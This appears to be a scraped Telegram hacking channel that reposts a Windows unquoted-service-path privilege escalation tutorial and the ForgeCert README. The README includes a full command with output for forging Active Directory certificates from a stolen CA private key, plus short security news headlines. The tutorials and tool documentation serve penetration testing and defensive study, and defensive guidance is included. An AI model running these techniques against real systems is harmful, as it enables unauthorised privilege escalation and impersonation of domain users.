Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Windows Privilege Escalation: Unquoted Service Path

Unquoted Path or Unquoted Service path is reported as a critical vulnerability in Windows, such vulnerability allows an attacker to escalate the privilege for NT AUTHORITY/SYSTEM for a low-level privilege user account.

Table of Content· Introduction Unquoted Service PathIf the path to the service binary is not enclosed in quotes and contains white spaces, the name of a loophole for an installed service is Service Unquoted Path. As a result, a local user will be able to elevate the privilege to administrator privilege shell by placing an executable in a higher level directory within the path.Mitre ID:T1574.009Tactics:Privilege Escalation & Persistence Platforms:WindowsTarget Machine:Windows 10Attacker Machine:Kali LinuxTools: SubinACL, PowerUP.ps1, Winpeas.Condition:Compromise the target machine with low privilege access either using Metasploit or Netcat, etc. Objective:Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting unquoted path Vulnerability.Steps to Setup Vulnerable EnvironmentCreate a new folder and Sub Folder and named it “Ignite Data” & “Vuln Service” respectively Step2:Create vulnerable service with name file.exeStep3:Grant writeable for BUILTIN\Users on Ignite Data folder with the help of icacls*icaclsare Microsoft Windows native command-line programmes that can display and modify permissions on directories and files.https://blogger.googleusercontent.com/img/a/AVvXsEgi7vvII1haOA4-I4LUR4_o1IjspA7iVGWeFCZPwj8GM4YEXKhPOeRy7SULa6Ld7oc3MmrD7LxIK07GP9Zv_aNXclaXwFqjoTHFlYTiz5jm6LnEShc5p6SLkWA7b8B3iOkBg5Is7A81CAIrmAVHrRb61HNgWjxTzMWCLfNNSqr0D5I5LNM3Xnnn0mo4SA=s16000 Step4:To create a vulnerable service we need to assign[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Windows Privilege Escalation: Unquoted Service Path Unquoted Path or Unquoted Service path is reported as a critical vulnerability in Windows, such vulnerability allows an attacker to escalate the privilege for NT AUTHORITY/SYSTEM…
some toxic privilege with the help of SubinACL to change the permission of services. NOTE:SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with security permissions in Windows. This tool is capable of changing the permissions of files, folders, registry keys, services, printers, cluster shares and various other types of objects.In this case, we have granted a user permissions to suspend (pause/continue), start and stop (restart) a service. The full list of the available service permissions:Step5:After Download SubinACL, execute the following command to assign PTOC Permissions user “ignite” against “Pentest” service.Abusing Unquoted Service PathsAbusing unquoted service is a technique that exploits insecure file permission in order to escalated privileges for local users. Download the PowerUp.ps1 script inside Kali Linux which will return the name and binary path for services with unquoted paths that also have a space in the name.___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
some toxic privilege with the help of SubinACL to change the permission of services. NOTE:SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with security permissions in Windows. This tool is capable of changing…
OCV2sZ9nBGKsf5ENQQ=s16000 It’s time to exploit the weak configured services against unquoted paths in order to privilege for user Shreya. As we know unquoted folder name is Vuln Service thus we will create a file with the name Vuln.exe with the help of msfvenom. Vuln.exeMitigation Ensure that any services that contain a space in the path enclose the path in quotes. Restrict File and Directory Permissions:Restrict access by setting directory and file permissions that are not specific to users or privileged accountsExecution Prevention:Block execution of code on a system through application control, and/or script blocking.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Windows Privilege Escalation: Insecure GUI Application

Introduction In the series of Privilege escalation, till now we have learned that Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows components including services, files, and registry entries. Today through applications we are going to exploit the privileges. Many GUI applications need

The post Windows Privilege Escalation: Insecure GUI Application appeared first on Hacking Articles.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Windows Privilege Escalation: Unquoted Service Path

Unquoted Path or Unquoted Service path is reported as a critical vulnerability in Windows, such vulnerability allows an attacker to escalate the privilege for NT AUTHORITY/SYSTEM for a low-level privilege user account. Table of Content Introduction Vulnerability Insight Prerequisite Lab Setup Abusing Unquoted Service Paths Mitigation Introduction Unquoted Service Path

The post Windows Privilege Escalation: Unquoted Service Path appeared first on Hacking Articles.

___________________________
@hacking_Attack
@Hacking_Video
ForgeCert uses the BouncyCastle C# API (https://www.bouncycastle.org/csharp/index.html) and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication (https://www.kitploit.com/search/label/Authentication) to Active Directory. This attack is codified as DPERSIST1 in our "Certified Pre-Owned" whitepaper (https://specterops.io/assets/resources/Certified_Pre-Owned.pdf). This code base was released ~45 days after the whitepaper was published. @tifkin_ (https://twitter.com/tifkin_) is the primary author of ForgeCert. @tifkin_ (https://twitter.com/tifkin_) and @harmj0y (https://twitter.com/harmj0y) are the primary authors of the associated Active Directory Certificate (https://www.kitploit.com/search/label/Active%20Directory%20Certificate) Service research (blog (https://posts.specterops.io/certified-pre-owned-d95910965cd2) and whitepaper (https://specterops.io/assets/resources/Certified_Pre-Owned.pdf)).
Background
As described in the Background and Forging Certificates (https://www.kitploit.com/search/label/Certificates) with Stolen CA Certificates - DPERSIST1 sections of our whitepaper (https://specterops.io/assets/resources/Certified_Pre-Owned.pdf), the private key for a Certificate Authority's CA certificate is protected on the CA server either via DPAPI or hardware (HSM/TPM). Additionally, the certificate (sans private key) is published to the NTAuthCertificates forest object, which defines CA certificates that enable authentication to AD. Put together, a CA whose certificate is present in NTAuthCertificates uses its private key to sign certificate signing requests (CSRs) from requesting clients. This graphic summarizes the process:

___________________________
@hacking_Attack
@Hacking_Video
Command Line Usage
ForgeCert.exe ForgeCert 1.0.0.0 Copyright c 2021 ERROR(S): Required option 'CaCertPath' is missing. Required option 'SubjectAltName' is missing. Required option 'NewCertPath' is missing. Required option 'NewCertPassword' is missing. --CaCertPath Required. CA private key as a .pfx or .p12 file --CaCertPassword Password to the CA private key file --Subject (Default: CN=User) Subject name in the certificate --SubjectAltName Required. UPN of the user to authenticate as --NewCertPath Required. Path where to save the new .pfx certificate --NewCertPassword Required. Password to the .pfx file --CRL ldap path to a CRL for the forged certificate --help Display this help screen. --version Display version information. ">C:\Temp>ForgeCert.exe
ForgeCert 1.0.0.0
Copyright c 2021

ERROR(S):
Required option 'CaCertPath' is missing.
Required option 'SubjectAltName' is missing.
Required option 'NewCertPath' is missing.
Required option 'NewCertPassword' is missing.

--CaCertPath Required. CA private key as a .pfx or .p12 file

--CaCertPassword Password to the CA private key file

--Subject (Default: CN=User) Subject name in the certificate

--SubjectAltName Required. UPN of the user to authenticate as

--NewCertPath Required. Path where to save the new .pfx certificate

--NewCertPassword Required. Password to the .pfx file

--CRL ldap path to a CRL for the forged certificate

--help Display this help screen.

--version Display version information.


Usage
Note: for a complete walkthrough of stealing a CA private key and forging auth certs, see DPERSIST1 in the whitepaper (https://specterops.io/assets/resources/Certified_Pre-Owned.pdf). Context: The stolen CA's certificate is ca.pfx, encrypted with a password of Password123! The subject is arbitrary since we're specifying a subject alternative name for the certificate. The subject alternative name (i.e., the user we're forging a certificate for), is localadmin@theshire.local. The forged certificate will be saved as localadmin.pfx, encrypted with the password NewPassword123! ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "Password123!" --Subject "CN=User" --SubjectAltName "localadmin@theshire.local" --NewCertPath localadmin.pfx --NewCertPassword "NewPassword123!" CA Certificate Information: Subject: CN=theshire-DC-CA, DC=theshire, DC=local Issuer: CN=theshire-DC-CA, DC=theshire, DC=local Start Date: 1/4/2021 10:48:02 AM End Date: 1/4/2026 10:58:02 AM Thumbprint: 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2 Serial: 14BFC25F2B6EEDA94404D5A5B0F33E21 Forged Certificate Information: Subject: CN=User SubjectAltName: localadmin@theshire.local Issuer: CN=theshire-DC-CA, DC=theshire, DC=local Start Date: 7/26/2021 3:38:45 PM End Date: 7/26/2022 3:38:45 PM Thumbprint: C5789A24E91A40819EFF7CFD77150595F8B9878D Serial: 3627A48F90F6869C3215FF05BC3B2E42 Done. Saved forged certificate to localadmin.pfx with the password 'NewPassword123!' ">C:\Tools\ForgeCert>ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "Password123!" --Subject "CN=User" --SubjectAltName "localadmin@theshire.local" --NewCertPath localadmin.pfx --NewCertPassword "NewPassword123!"
CA Certificate Information:
Subject: CN=theshire-DC-CA, DC=theshire, DC=local
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 1/4/2021 10:48:02 AM
End Date: 1/4/2026 10:58:02 AM
Thumbprint: 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2
Serial: 14BFC25F2B6EEDA94404D5A5B0F33E21

Forged Certificate Information:
Subject: CN=User
SubjectAltName: localadmin@theshire.local

___________________________
@hacking_Attack
@Hacking_Video
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 7/26/2021 3:38:45 PM
End Date: 7/26/2022 3:38:45 PM
Thumbprint: C5789A24E91A40819EFF7CFD77150595F8B9878D
Serial: 3627A48F90F6869C3215FF05BC3B2E42

Done. Save d forged certificate to localadmin.pfx with the password 'NewPassword123!'
This forgery can be done on an attacker-controlled system, and the resulting certificate can be used with Rubeus (https://github.com/GhostPack/Rubeus) to request a TGT (and/or retrieve the user's NTLM ;)
Defensive Considerations
The TypeRefHash (https://www.gdatasoftware.com/blog/2020/06/36164-introducing-the-typerefhash-trh) of the current ForgeCert codebase is b26b451ff2c947ae5904f962e56facbb45269995fbb813070386472f307cfcf0. The TypeLib GUID of ForgeCert is bd346689-8ee6-40b3-858b-4ed94f08d40a. This is reflected in the Yara rules currently in this repo. See PREVENT1, DETECT3, and DETECT5 in our whitepaper (https://specterops.io/assets/resources/Certified_Pre-Owned.pdf) for prevention and detection guidance. Fabian Bader (https://twitter.com/fabian_bader) published a great post on how to mitigate many uses of "Golden Certificates" (https://cloudbrothers.info/en/golden-certificate-ocsp/) through OSCP tweaks. Note thought that in the Final Thoughts section he mentions This method is not bulletproof at all. Since the attacker is in charge of the certificate creation process, she could just change the serial number to a valid one. This was implemented in his PR (https://github.com/GhostPack/ForgeCert/commit/a202e03d7cee48413514c8659ad042a7f546d94b), though remember that by default the serial number will be randomized, meaning the OSCP prevention should work in many cases and is worth implementing in our opinion. We believe there may opportunities to build Yara/other detection rules for types of forged certificates this project produces - if any defensive researchers find a good way to signature these files, please let us know and we will update the Yara rules/defensive guidance here.
Reflections
There is a clear parallel between "Golden Tickets" (forged TGTs) and these "Golden Certificates" (forced AD CS certs). Both the krbtgt hash and CA private key are cryptographic material critical to the security of an Active Directory (https://www.kitploit.com/search/label/Active%20Directory) environment, and both can be used to forge authenticators for arbitrary users. However, while the krbtgt hash can be retrieved remotely over DCSync, a CA private key must (at least as far as we know) be recovered through code execution on the CA machine itself. While a krbtgt hash can be rotated relatively easily, rotating a CA private key is significantly more difficult. On the subject of public disclosure, we self-embargoed the release of our offensive tooling (ForgeCert as well as Certify (https://github.com/GhostPack/Certify)) for ~45 days after we published our whitepaper (https://specterops.io/assets/resources/Certified_Pre-Owned.pdf) in order to give organizations a chance to get a grip on the issues surrounding Active Directory Certificate Services. However, we have found that organizations and vendors have historically often not fixed issues or built detections for "theoretical" attacks until someone proves something is possible with a proof of concept. This is reflected in some people's reaction to the research of this IS StUPId, oF COurse YoU Can FORge CERts WITH ThE ca PriVAtE KeY. To which we state, yes, many things are possible, but PoC||GTFO

Download ForgeCert (https://github.com/GhostPack/ForgeCert)

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Digging Deep Into the Top Security Certifications

When it comes to technical certifications, which ones pay off so you can get that infosec job or more money for the one you're already doing?
Dark Reading: Attacks/Breaches
Increased Security Spending to Support Distributed Workforce

Security leaders are deploying or actively considering cloud security, threat intel, and XDR technologies.
Dark Reading: Attacks/Breaches
Enterprise Data Storage Environments Riddled With Vulnerabilities

Many organizations are not properly protecting their storage and backup systems from compromise, new study finds.